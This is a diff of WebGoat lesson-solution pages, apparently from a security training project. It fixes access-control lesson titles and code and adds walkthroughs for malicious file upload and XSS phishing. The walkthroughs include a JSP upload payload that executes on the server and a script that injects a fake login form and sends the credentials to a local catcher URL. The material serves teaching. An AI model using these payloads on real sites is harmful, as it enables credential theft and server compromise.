<title>Solution: JSON Injection</title>
<link rel=File-List href="lesson_solutions/JSONInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/JSONInjection_files/editdata.mso">
<!--[if !mso]>

4
src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html
View File

@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 2</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents
@ -38,7 +38,7 @@ There is already a method called isAuthorized which you can use:
</p>
<pre><code>
//***************CODE HERE*************************
if(!isAuthorized(s, userId, requestedActionName))
if(!isAuthorized(s, getUserId(s), requestedActionName))
{
throw new UnauthorizedException();
}

6
src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html
View File

@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 4</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents
@ -39,11 +39,11 @@ Action has already a method called isAuthorizedForEmployee which you can use:
</p>
<pre><code>
//***************CODE HERE*************************
if(!isAuthorized(s, userId, requestedActionName))
if(!isAuthorized(s, getUserId(s), requestedActionName))
{
throw new UnauthorizedException();
}
if(!action.isAuthorizedForEmployee(s, userId, employeeId))
if(!action.isAuthorizedForEmployee(s, getUserId(s), s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)))
{
throw new UnauthorizedException();
}

2
src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html
View File

@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 1</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents

2
src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html
View File

@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 3</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents

2
src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html
View File

@ -19,7 +19,7 @@ For this exercise, you will perform stored and reflected XSS attacks. You will a
<p><b>Solution:</b><br/>
You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class.
<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class.
Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.</p>
</body>

46
src/main/webapp/lesson_solutions/MaliciousFileExecution.html Normal file
View File

@ -0,0 +1,46 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Malicious File Execution</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Malicious File Execution</p>
<p><b>Concept / Topic To Teach:</b><br/>
Many sites allow the user to upload files, such as images or videos. Without the proper security, files containing malicious commands can be and then executed on the server.
</p>
<p><b>General Goal(s):</b><br/>
The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution.<br/><br/>
In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute, it should create another file named guest.txt<br/><br/>
Once you have created this file, you will pass the lesson.
</p>
<b>Solution:</b><br/><br/>
The first step of malicious file execution is to create a file that we can run on the server. In this lesson, our goal is to create the file <b>guest.txt</b> in the directory provided in the lesson (the path is generated based on your system).<br/><br/>
To do this, we write a .jsp file that uses the java createNewFile() command. The file contents will look like this:<br/>
&lt;HTML&gt;
&lt;%
java.io.File file = new java.io.File(&quot;<b>filepath</b>\\guest.txt&quot;);
file.createNewFile();
%&gt;
&lt;/HTML&gt;<br/><br/>
The <b>&lt;%</b> indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by <b>\\</b>, not <b>\</b>. The filename of the .jsp doesn't matter, as long as you know what it is.<br/><br/>
Next, we need to figure out where the files are being uploaded so we can execute them. In this case, since we are shown the image, this is very easy. Upload an image using the form, then right click on it and check its properties.<br/>
<img src="lesson_solutions/MaliciousFileExecution_files/image001.jpg"><br/>
<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
</body>
</html>

BIN
src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 145 KiB

BIN
src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 288 KiB

14
src/main/webapp/lesson_solutions/OffByOne.html Normal file
View File

@ -0,0 +1,14 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Modify Data with SQL</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Off By One Buffer Overflows</p>
<p>This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to <a href="mailto:WebGoat@owasp.org">WebGoat@owasp.org</a>.</p>
</body>
</html>

44
src/main/webapp/lesson_solutions/Phishing.html
View File

@ -1,7 +1,7 @@
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<title>Phising with XSS</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
@ -30,38 +30,40 @@ This solution consists of two parts you have to combine:
</ul>
A Form with username and password could look like this:<br/>
<p>
&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
&lt;/form&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
<br/><br/>Search for this term and you will see that a form is added to the page.
<br/><br/>Search for this term and you will see that a form is added to the page since the search field accepts HTML.
<br/>The initial &lt;/form&gt; tag is to terminate the original search form.
</p>
Now you need a script:
<p>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
&lt;/script&gt;
</p>
<p>
This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
This script will read the input from the form and send it to the catcher of WebGoat.<br/>
The text <font color="blue">in blue</font> should match what is in your address bar. If you are using ports and/or webscarab, it may be different.<br/>
The last step is to put things together. Add a Button to the form which
calls the script. You can reach this with the onclick="myFunction" handler.
calls the script. You can reach this with the onclick="myFunction()" handler:
</p>
<p>
&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;
<p>
The final String looks like this:<br/>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot;
value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
</p>
Search for this String and you will see a form asking for your username and password.
Fill in these fields and click on the Login Button.
Fill in these fields and click on the Login Button, which completes the lesson.<br/><br/>
<img src="lesson_solutions/Phishing_files/image001.jpg"><br/>
<font size="2"><b>New login field after submitting the script.</b></font><br/><br/><br/>
</body>
</html>

BIN
src/main/webapp/lesson_solutions/Phishing_files/image001.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 88 KiB

641
src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html Normal file
View File

@ -0,0 +1,641 @@
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Same Origin Policy Protection</title>
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>egeirnaert</o:Author>
<o:LastAuthor>egeirnaert</o:LastAuthor>
<o:Revision>3</o:Revision>
<o:TotalTime>54</o:TotalTime>
<o:Created>2007-07-11T15:30:00Z</o:Created>
<o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
<o:Pages>2</o:Pages>
<o:Words>607</o:Words>
<o:Characters>3461</o:Characters>
<o:Company> </o:Company>
<o:Lines>28</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>4060</o:CharactersWithSpaces>
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
